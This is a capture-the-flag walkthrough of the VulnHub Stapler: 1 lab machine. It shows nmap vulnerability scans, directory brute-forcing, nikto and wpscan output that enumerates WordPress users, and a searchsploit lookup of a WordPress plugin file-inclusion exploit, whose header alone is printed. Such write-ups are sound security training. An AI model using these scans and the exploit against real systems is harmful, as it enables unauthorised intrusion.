VulnHub target machine walkthrough [Stapler-1]

Name

Name: Stapler: 1
Release date: 8 June 2016

Download

Stapler.zip

  • Download (Mirror): https://download.vulnhub.com/stapler/Stapler.zip
  • Download (Torrent): https://download.vulnhub.com/stapler/Stapler.zip.torrent

Description

+---------------------------------------------------------+
| |
| __..--''\ |
| __..--'' \ |
| __..--'' __..--'' |
| __..--'' __..--'' | |
| \ o __..--''____....----"" |
| \__..--''\ |
| | \ |
| +----------------------------------+ |
| +----------------------------------+ |
| |
+- - - - - - - - - - - - - -|- - - - - - - - - - - - - - -+
| Name: Stapler | IP: DHCP |
| Date: 2016-June-08 | Goal: Get Root! |
| Author: g0tmi1k | Difficulty: ??? ;) |
+- - - - - - - - - - - - - -|- - - - - - - - - - - - - - -+
| |
| + Average beginner/intermediate VM, with only a few twists |
| + You may find it easy/hard (depending on your level) |
| + ...and on how you approach the box |
| |
| + It should work on both VMware and VirtualBox |
| + If you change the network mode, reboot the VM |
| + Fusion users need to retry when importing |
| |
| + There are multiple ways of doing this machine |
| + At least two (2) paths to get a limited shell |
| + At least three (3) ways to get root access |
| |
| + Made for BsidesLondon 2016 |
| + Slides: https://download.vulnhub.com/media/stapler/ |
| |
| + Thanks g0tmi1k, nullmode, rasta_mouse & superkojiman |
| + ...and a shout-out to the VulnHub-CTF team =) |
| |
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - -+
| |
| --[[~~Enjoy. Have fun. Happy Hacking.~~]]-- |
| |
+---------------------------------------------------------+

Information gathering

Run nmap

root@kali:~# nmap -sn -v 192.168.56.*
Nmap scan report for 192.168.56.122
Host is up (0.00013s latency).
MAC Address: 08:00:27:03:5A:E4 (Oracle VirtualBox virtual NIC)
root@kali:~# nmap -sV -v -p- 192.168.56.122
PORT STATE SERVICE VERSION
20/tcp closed ftp-data
21/tcp open ftp vsftpd 2.0.8 or later
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
53/tcp open domain dnsmasq 2.75
80/tcp open http PHP cli server 5.5 or later
123/tcp closed ntp
137/tcp closed netbios-ns
138/tcp closed netbios-dgm
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
666/tcp open doom?
3306/tcp open mysql MySQL 5.7.12-0ubuntu1
12380/tcp open http Apache httpd 2.4.18 ((Ubuntu))
root@kali:~# nmap -A -T4 -v --script=vuln -p 21,22,53,80,139,666,3306,12380 192.168.56.122
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.0.8 or later
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_sslv2-drown:
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
53/tcp open domain dnsmasq 2.75
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
80/tcp open http PHP cli server 5.5 or later
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server's resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_ http://ha.ckers.org/slowloris/
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
666/tcp open doom?
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| fingerprint-strings:
| NULL:
| message2.jpgUT
| QWux
| "DL[E
| #;3[
| \xf6
| u([r
| qYQq
| Y_?n2
| 3&M~{
| 9-a)T
| L}AJ
|_ .npy.9
3306/tcp open mysql MySQL 5.7.12-0ubuntu1
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
12380/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-server-header: Apache/2.4.18 (Ubuntu)
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server's resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_ http://ha.ckers.org/slowloris/
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.10 - 4.11, Linux 3.2 - 4.9, Linux 4.4
Uptime guess: 0.016 days (since Mon Apr 13 03:19:38 2020)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=259 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: Host: RED; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| smb-vuln-cve2009-3103:
| VULNERABLE:
| SMBv2 exploit (CVE-2009-3103, Microsoft Security Advisory 975497)
| State: VULNERABLE
| IDs: CVE:CVE-2009-3103
| Array index error in the SMBv2 protocol implementation in srv2.sys in Microsoft Windows Vista Gold, SP1, and SP2,
| Windows Server 2008 Gold and SP2, and Windows 7 RC allows remote attackers to execute arbitrary code or cause a
| denial of service (system crash) via an & (ampersand) character in a Process ID High header field in a NEGOTIATE
| PROTOCOL REQUEST packet, which triggers an attempted dereference of an out-of-bounds memory location,
| aka "SMBv2 Negotiation Vulnerability."
|
| Disclosure date: 2009-09-08
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103
|_ http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: false
| smb-vuln-regsvc-dos:
| VULNERABLE:
| Service regsvc in Microsoft Windows systems vulnerable to denial of service
| State: VULNERABLE
| The service regsvc in Microsoft Windows 2000 systems is vulnerable to denial of service caused by a null deference
| pointer. This script will crash the service if it is vulnerable. This vulnerability was discovered by Ron Bowes
| while working on smb-enum-sessions.
|_

Scan the directories on port 12380 with dirb

root@kali:~# dirb https://192.168.56.122:12380/

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Mon Apr 13 22:11:33 2020
URL_BASE: https://192.168.56.122:12380/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: https://192.168.56.122:12380/ ----
==> DIRECTORY: https://192.168.56.122:12380/announcements/
+ https://192.168.56.122:12380/index.html (CODE:200|SIZE:21)
==> DIRECTORY: https://192.168.56.122:12380/javascript/
==> DIRECTORY: https://192.168.56.122:12380/phpmyadmin/
+ https://192.168.56.122:12380/robots.txt (CODE:200|SIZE:59)
+ https://192.168.56.122:12380/server-status (CODE:403|SIZE:305)

---- Entering directory: https://192.168.56.122:12380/announcements/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: https://192.168.56.122:12380/javascript/ ----
==> DIRECTORY: https://192.168.56.122:12380/javascript/jquery/

---- Entering directory: https://192.168.56.122:12380/phpmyadmin/ ----
==> DIRECTORY: https://192.168.56.122:12380/phpmyadmin/doc/
+ https://192.168.56.122:12380/phpmyadmin/favicon.ico (CODE:200|SIZE:22486)
+ https://192.168.56.122:12380/phpmyadmin/index.php (CODE:200|SIZE:10332)
==> DIRECTORY: https://192.168.56.122:12380/phpmyadmin/js/
+ https://192.168.56.122:12380/phpmyadmin/libraries (CODE:403|SIZE:312)
==> DIRECTORY: https://192.168.56.122:12380/phpmyadmin/locale/
+ https://192.168.56.122:12380/phpmyadmin/phpinfo.php (CODE:200|SIZE:10334)
+ https://192.168.56.122:12380/phpmyadmin/setup (CODE:401|SIZE:464)
==> DIRECTORY: https://192.168.56.122:12380/phpmyadmin/sql/
==> DIRECTORY: https://192.168.56.122:12380/phpmyadmin/templates/
==> DIRECTORY: https://192.168.56.122:12380/phpmyadmin/themes/

---- Entering directory: https://192.168.56.122:12380/javascript/jquery/ ----
+ https://192.168.56.122:12380/javascript/jquery/jquery (CODE:200|SIZE:284394)

---- Entering directory: https://192.168.56.122:12380/phpmyadmin/doc/ ----
==> DIRECTORY: https://192.168.56.122:12380/phpmyadmin/doc/html/

---- Entering directory: https://192.168.56.122:12380/phpmyadmin/js/ ----
==> DIRECTORY: https://192.168.56.122:12380/phpmyadmin/js/jquery/
==> DIRECTORY: https://192.168.56.122:12380/phpmyadmin/js/transformations/

---- Entering directory: https://192.168.56.122:12380/phpmyadmin/locale/ ----
==> DIRECTORY: https://192.168.56.122:12380/phpmyadmin/locale/az/
==> DIRECTORY: https://192.168.56.122:12380/phpmyadmin/locale/bg/
==> DIRECTORY: https://192.168.56.122:12380/phpmyadmin/locale/ca/
==> DIRECTORY: https://192.168.56.122:12380/phpmyadmin/locale/cs/
==> DIRECTORY: https://192.168.56.122:12380/phpmyadmin/locale/da/
==> DIRECTORY: https://192.168.56.122:12380/phpmyadmin/locale/de/
==> DIRECTORY: https://192.168.56.122:12380/phpmyadmin/locale/el/
==> DIRECTORY: https://192.168.56.122:12380/phpmyadmin/locale/es/
==> DIRECTORY: https://192.168.56.122:12380/phpmyadmin/locale/et/
==> DIRECTORY: https://192.168.56.122:12380/phpmyadmin/locale/fi/
==> DIRECTORY: https://192.168.56.122:12380/phpmyadmin/locale/fr/
==> DIRECTORY: https://192.168.56.122:12380/phpmyadmin/locale/gl/
==> DIRECTORY: https://192.168.56.122:12380/phpmyadmin/locale/hu/
==> DIRECTORY: https://192.168.56.122:12380/phpmyadmin/locale/ia/
==> DIRECTORY: https://192.168.56.122:12380/phpmyadmin/locale/id/
==> DIRECTORY: https://192.168.56.122:12380/phpmyadmin/locale/it/
==> DIRECTORY: https://192.168.56.122:12380/phpmyadmin/locale/ja/
==> DIRECTORY: https://192.168.56.122:12380/phpmyadmin/locale/ko/
==> DIRECTORY: https://192.168.56.122:12380/phpmyadmin/locale/lt/
==> DIRECTORY: https://192.168.56.122:12380/phpmyadmin/locale/nl/
==> DIRECTORY: https://192.168.56.122:12380/phpmyadmin/locale/pl/
==> DIRECTORY: https://192.168.56.122:12380/phpmyadmin/locale/pt/
==> DIRECTORY: https://192.168.56.122:12380/phpmyadmin/locale/pt_BR/
==> DIRECTORY: https://192.168.56.122:12380/phpmyadmin/locale/ro/
==> DIRECTORY: https://192.168.56.122:12380/phpmyadmin/locale/ru/
==> DIRECTORY: https://192.168.56.122:12380/phpmyadmin/locale/si/
==> DIRECTORY: https://192.168.56.122:12380/phpmyadmin/locale/sk/
==> DIRECTORY: https://192.168.56.122:12380/phpmyadmin/locale/sl/
==> DIRECTORY: https://192.168.56.122:12380/phpmyadmin/locale/sq/
==> DIRECTORY: https://192.168.56.122:12380/phpmyadmin/locale/sv/
==> DIRECTORY: https://192.168.56.122:12380/phpmyadmin/locale/tr/
==> DIRECTORY: https://192.168.56.122:12380/phpmyadmin/locale/uk/
==> DIRECTORY: https://192.168.56.122:12380/phpmyadmin/locale/vi/
==> DIRECTORY: https://192.168.56.122:12380/phpmyadmin/locale/zh_CN/
==> DIRECTORY: https://192.168.56.122:12380/phpmyadmin/locale/zh_TW/

---- Entering directory: https://192.168.56.122:12380/phpmyadmin/sql/ ----

---- Entering directory: https://192.168.56.122:12380/phpmyadmin/templates/ ----
==> DIRECTORY: https://192.168.56.122:12380/phpmyadmin/templates/components/
==> DIRECTORY: https://192.168.56.122:12380/phpmyadmin/templates/database/
==> DIRECTORY: https://192.168.56.122:12380/phpmyadmin/templates/error/
==> DIRECTORY: https://192.168.56.122:12380/phpmyadmin/templates/javascript/
==> DIRECTORY: https://192.168.56.122:12380/phpmyadmin/templates/list/
==> DIRECTORY: https://192.168.56.122:12380/phpmyadmin/templates/navigation/
==> DIRECTORY: https://192.168.56.122:12380/phpmyadmin/templates/table/
==> DIRECTORY: https://192.168.56.122:12380/phpmyadmin/templates/test/

---- Entering directory: https://192.168.56.122:12380/phpmyadmin/themes/ ----
==> DIRECTORY: https://192.168.56.122:12380/phpmyadmin/themes/original/

---- Entering directory: https://192.168.56.122:12380/phpmyadmin/doc/html/ ----
+ https://192.168.56.122:12380/phpmyadmin/doc/html/index.html (CODE:200|SIZE:12811)

---- Entering directory: https://192.168.56.122:12380/phpmyadmin/js/jquery/ ----

---- Entering directory: https://192.168.56.122:12380/phpmyadmin/js/transformations/ ----

---- Entering directory: https://192.168.56.122:12380/phpmyadmin/locale/az/ ----

---- Entering directory: https://192.168.56.122:12380/phpmyadmin/locale/bg/ ----

---- Entering directory: https://192.168.56.122:12380/phpmyadmin/locale/ca/ ----

---- Entering directory: https://192.168.56.122:12380/phpmyadmin/locale/cs/ ----

---- Entering directory: https://192.168.56.122:12380/phpmyadmin/locale/da/ ----

---- Entering directory: https://192.168.56.122:12380/phpmyadmin/locale/de/ ----

---- Entering directory: https://192.168.56.122:12380/phpmyadmin/locale/el/ ----

---- Entering directory: https://192.168.56.122:12380/phpmyadmin/locale/es/ ----

---- Entering directory: https://192.168.56.122:12380/phpmyadmin/locale/et/ ----

---- Entering directory: https://192.168.56.122:12380/phpmyadmin/locale/fi/ ----

---- Entering directory: https://192.168.56.122:12380/phpmyadmin/locale/fr/ ----

---- Entering directory: https://192.168.56.122:12380/phpmyadmin/locale/gl/ ----

---- Entering directory: https://192.168.56.122:12380/phpmyadmin/locale/hu/ ----

---- Entering directory: https://192.168.56.122:12380/phpmyadmin/locale/ia/ ----

---- Entering directory: https://192.168.56.122:12380/phpmyadmin/locale/id/ ----

---- Entering directory: https://192.168.56.122:12380/phpmyadmin/locale/it/ ----

---- Entering directory: https://192.168.56.122:12380/phpmyadmin/locale/ja/ ----

---- Entering directory: https://192.168.56.122:12380/phpmyadmin/locale/ko/ ----

---- Entering directory: https://192.168.56.122:12380/phpmyadmin/locale/lt/ ----

---- Entering directory: https://192.168.56.122:12380/phpmyadmin/locale/nl/ ----

---- Entering directory: https://192.168.56.122:12380/phpmyadmin/locale/pl/ ----

---- Entering directory: https://192.168.56.122:12380/phpmyadmin/locale/pt/ ----

---- Entering directory: https://192.168.56.122:12380/phpmyadmin/locale/pt_BR/ ----

---- Entering directory: https://192.168.56.122:12380/phpmyadmin/locale/ro/ ----

---- Entering directory: https://192.168.56.122:12380/phpmyadmin/locale/ru/ ----

---- Entering directory: https://192.168.56.122:12380/phpmyadmin/locale/si/ ----

---- Entering directory: https://192.168.56.122:12380/phpmyadmin/locale/sk/ ----

---- Entering directory: https://192.168.56.122:12380/phpmyadmin/locale/sl/ ----

---- Entering directory: https://192.168.56.122:12380/phpmyadmin/locale/sq/ ----

---- Entering directory: https://192.168.56.122:12380/phpmyadmin/locale/sv/ ----

---- Entering directory: https://192.168.56.122:12380/phpmyadmin/locale/tr/ ----

---- Entering directory: https://192.168.56.122:12380/phpmyadmin/locale/uk/ ----

---- Entering directory: https://192.168.56.122:12380/phpmyadmin/locale/vi/ ----

---- Entering directory: https://192.168.56.122:12380/phpmyadmin/locale/zh_CN/ ----

---- Entering directory: https://192.168.56.122:12380/phpmyadmin/locale/zh_TW/ ----

---- Entering directory: https://192.168.56.122:12380/phpmyadmin/templates/components/ ----

---- Entering directory: https://192.168.56.122:12380/phpmyadmin/templates/database/ ----

---- Entering directory: https://192.168.56.122:12380/phpmyadmin/templates/error/ ----

---- Entering directory: https://192.168.56.122:12380/phpmyadmin/templates/javascript/ ----

---- Entering directory: https://192.168.56.122:12380/phpmyadmin/templates/list/ ----

---- Entering directory: https://192.168.56.122:12380/phpmyadmin/templates/navigation/ ----

---- Entering directory: https://192.168.56.122:12380/phpmyadmin/templates/table/ ----
==> DIRECTORY: https://192.168.56.122:12380/phpmyadmin/templates/table/chart/
==> DIRECTORY: https://192.168.56.122:12380/phpmyadmin/templates/table/search/

---- Entering directory: https://192.168.56.122:12380/phpmyadmin/templates/test/ ----

---- Entering directory: https://192.168.56.122:12380/phpmyadmin/themes/original/ ----
==> DIRECTORY: https://192.168.56.122:12380/phpmyadmin/themes/original/css/
==> DIRECTORY: https://192.168.56.122:12380/phpmyadmin/themes/original/img/
==> DIRECTORY: https://192.168.56.122:12380/phpmyadmin/themes/original/jquery/

---- Entering directory: https://192.168.56.122:12380/phpmyadmin/templates/table/chart/ ----

---- Entering directory: https://192.168.56.122:12380/phpmyadmin/templates/table/search/ ----

---- Entering directory: https://192.168.56.122:12380/phpmyadmin/themes/original/css/ ----

---- Entering directory: https://192.168.56.122:12380/phpmyadmin/themes/original/img/ ----

---- Entering directory: https://192.168.56.122:12380/phpmyadmin/themes/original/jquery/ ----
==> DIRECTORY: https://192.168.56.122:12380/phpmyadmin/themes/original/jquery/images/

---- Entering directory: https://192.168.56.122:12380/phpmyadmin/themes/original/jquery/images/ ----
-----------------
END_TIME: Mon Apr 13 22:15:55 2020
DOWNLOADED: 290556 - FOUND: 10

Run nikto

root@kali:~# nikto -host http://192.168.56.122:12380/
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.122
+ Target Hostname: 192.168.56.122
+ Target Port: 12380
---------------------------------------------------------------------------
+ SSL Info: Subject: /C=UK/ST=Somewhere in the middle of nowhere/L=Really, what are you meant to put here?/O=Initech/OU=Pam: I give up. no idea what to put here./CN=Red.Initech/emailAddress=pam@red.localhost
Ciphers: ECDHE-RSA-AES256-GCM-SHA384
Issuer: /C=UK/ST=Somewhere in the middle of nowhere/L=Really, what are you meant to put here?/O=Initech/OU=Pam: I give up. no idea what to put here./CN=Red.Initech/emailAddress=pam@red.localhost
+ Start Time: 2020-04-13 21:55:57 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'dave' found, with contents: Soemthing doesn't look right here
+ The site uses SSL and the Strict-Transport-Security HTTP header is not defined.
+ The site uses SSL and Expect-CT header is not present.
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Entry '/admin112233/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/blogblog/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 2 entries which should be manually viewed.
+ Hostname '192.168.56.122' does not match certificate's names: Red.Initech
+ Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: OPTIONS, GET, HEAD, POST
+ Uncommon header 'x-ob_mode' found, with contents: 1
+ OSVDB-3233: /icons/README: Apache default file found.
+ /phpmyadmin/: phpMyAdmin directory found
+ 8071 requests: 0 error(s) and 15 item(s) reported on remote host
+ End Time: 2020-04-13 21:58:35 (GMT-4) (158 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

Scan https://192.168.56.122:12380/blogblog/ with wpscan

root@kali:~# wpscan --disable-tls-checks --url https://192.168.56.122:12380/blogblog/ --enumerate u
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|

WordPress Security Scanner by the WPScan Team
Version 3.7.11
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]
[+] URL: https://192.168.56.122:12380/blogblog/ [192.168.56.122]
[+] Started: Mon Apr 13 22:26:43 2020

Interesting Finding(s):

[+] Headers
| Interesting Entries:
| - Server: Apache/2.4.18 (Ubuntu)
| - Dave: Soemthing doesn't look right here
| Found By: Headers (Passive Detection)
| Confidence: 100%

[+] XML-RPC seems to be enabled: https://192.168.56.122:12380/blogblog/xmlrpc.php
| Found By: Headers (Passive Detection)
| Confidence: 100%
| Confirmed By:
| - Link Tag (Passive Detection), 30% confidence
| - Direct Access (Aggressive Detection), 100% confidence
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access

[+] https://192.168.56.122:12380/blogblog/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%

[+] Registration is enabled: https://192.168.56.122:12380/blogblog/wp-login.php?action=register
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%

[+] Upload directory has listing enabled: https://192.168.56.122:12380/blogblog/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%

[+] The external WP-Cron seems to be enabled: https://192.168.56.122:12380/blogblog/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 4.2.1 identified (Insecure, released on 2015-04-27).
| Found By: Rss Generator (Passive Detection)
| - https://192.168.56.122:12380/blogblog/?feed=rss2, <generator>http://wordpress.org/?v=4.2.1</generator>
| - https://192.168.56.122:12380/blogblog/?feed=comments-rss2, <generator>http://wordpress.org/?v=4.2.1</generator>

[+] WordPress theme in use: bhost
| Location: https://192.168.56.122:12380/blogblog/wp-content/themes/bhost/
| Last Updated: 2019-12-08T00:00:00.000Z
| Readme: https://192.168.56.122:12380/blogblog/wp-content/themes/bhost/readme.txt
| [!] The version is out of date, the latest version is 1.4.4
| Style URL: https://192.168.56.122:12380/blogblog/wp-content/themes/bhost/style.css?ver=4.2.1
| Style Name: BHost
| Description: Bhost is a nice , clean , beautifull, Responsive and modern design free WordPress Theme. This theme ...
| Author: Masum Billah
| Author URI: http://getmasum.net/
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 1.2.9 (80% confidence)
| Found By: Style (Passive Detection)
| - https://192.168.56.122:12380/blogblog/wp-content/themes/bhost/style.css?ver=4.2.1, Match: 'Version: 1.2.9'

[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:00 <=============================================> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] John Smith
| Found By: Author Posts - Display Name (Passive Detection)
| Confirmed By: Rss Generator (Passive Detection)

[+] barry
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)

[+] john
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)

[+] elly
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)

[+] garry
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)

[+] peter
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)

[+] heather
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)

[+] harry
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)

[+] scott
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)

[+] kathy
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)

[+] tim
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)

[!] No WPVulnDB API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 50 daily requests by registering at https://wpvulndb.com/users/sign_up

[+] Finished: Mon Apr 13 22:26:48 2020
[+] Requests Done: 69
[+] Cached Requests: 6
[+] Data Sent: 17.953 KB
[+] Data Received: 294.119 KB
[+] Memory used: 109.172 MB
[+] Elapsed time: 00:00:05
root@kali:~# wpscan --disable-tls-checks --url https://192.168.56.122:12380/blogblog/ --enumerate p
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|

WordPress Security Scanner by the WPScan Team
Version 3.7.11
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]
[+] URL: https://192.168.56.122:12380/blogblog/ [192.168.56.122]
[+] Started: Mon Apr 13 22:31:13 2020

Interesting Finding(s):

[+] Headers
| Interesting Entries:
| - Server: Apache/2.4.18 (Ubuntu)
| - Dave: Soemthing doesn't look right here
| Found By: Headers (Passive Detection)
| Confidence: 100%

[+] XML-RPC seems to be enabled: https://192.168.56.122:12380/blogblog/xmlrpc.php
| Found By: Headers (Passive Detection)
| Confidence: 100%
| Confirmed By:
| - Link Tag (Passive Detection), 30% confidence
| - Direct Access (Aggressive Detection), 100% confidence
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access

[+] https://192.168.56.122:12380/blogblog/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%

[+] Registration is enabled: https://192.168.56.122:12380/blogblog/wp-login.php?action=register
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%

[+] Upload directory has listing enabled: https://192.168.56.122:12380/blogblog/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%

[+] The external WP-Cron seems to be enabled: https://192.168.56.122:12380/blogblog/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 4.2.1 identified (Insecure, released on 2015-04-27).
| Found By: Rss Generator (Passive Detection)
| - https://192.168.56.122:12380/blogblog/?feed=rss2, <generator>http://wordpress.org/?v=4.2.1</generator>
| - https://192.168.56.122:12380/blogblog/?feed=comments-rss2, <generator>http://wordpress.org/?v=4.2.1</generator>

[+] WordPress theme in use: bhost
| Location: https://192.168.56.122:12380/blogblog/wp-content/themes/bhost/
| Last Updated: 2019-12-08T00:00:00.000Z
| Readme: https://192.168.56.122:12380/blogblog/wp-content/themes/bhost/readme.txt
| [!] The version is out of date, the latest version is 1.4.4
| Style URL: https://192.168.56.122:12380/blogblog/wp-content/themes/bhost/style.css?ver=4.2.1
| Style Name: BHost
| Description: Bhost is a nice , clean , beautifull, Responsive and modern design free WordPress Theme. This theme ...
| Author: Masum Billah
| Author URI: http://getmasum.net/
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 1.2.9 (80% confidence)
| Found By: Style (Passive Detection)
| - https://192.168.56.122:12380/blogblog/wp-content/themes/bhost/style.css?ver=4.2.1, Match: 'Version: 1.2.9'

[+] Enumerating Most Popular Plugins (via Passive Methods)

[i] No plugins Found.

[!] No WPVulnDB API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 50 daily requests by registering at https://wpvulndb.com/users/sign_up

[+] Finished: Mon Apr 13 22:31:17 2020
[+] Requests Done: 2
[+] Cached Requests: 32
[+] Data Sent: 616 B
[+] Data Received: 1.095 KB
[+] Memory used: 194.785 MB
[+] Elapsed time: 00:00:03

getshell

Visit

https://192.168.56.122:12380/blogblog/wp-content/plugins/

Search exploitdb

root@kali:~# searchsploit wordpress advanced video
---------------------------------------------------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
---------------------------------------------------------------------------------- ----------------------------------------
WordPress Plugin Advanced Video 1.0 - Local File Inclusion | exploits/php/webapps/39646.py
---------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result

View the contents of the exploit

root@kali:~/vulnhub/stapler-1# cat /usr/share/exploitdb/exploits/php/webapps/39646.py
#!/usr/bin/env python

# Exploit Title: Advanced-Video-Embed Arbitrary File Download / Unauthenticated Post Creation
# Google Dork: N/A
# Date: 04/01/2016
# Exploit Author: evait security GmbH
# Vendor Homepage: arshmultani - http://dscom.it/
# Software Link: https://wordpress.org/plugins/advanced-video-embed-embed-videos-or-playlists/
# Version: 1.0
# Tested on: Linux Apache / Wordpress 4.2.2

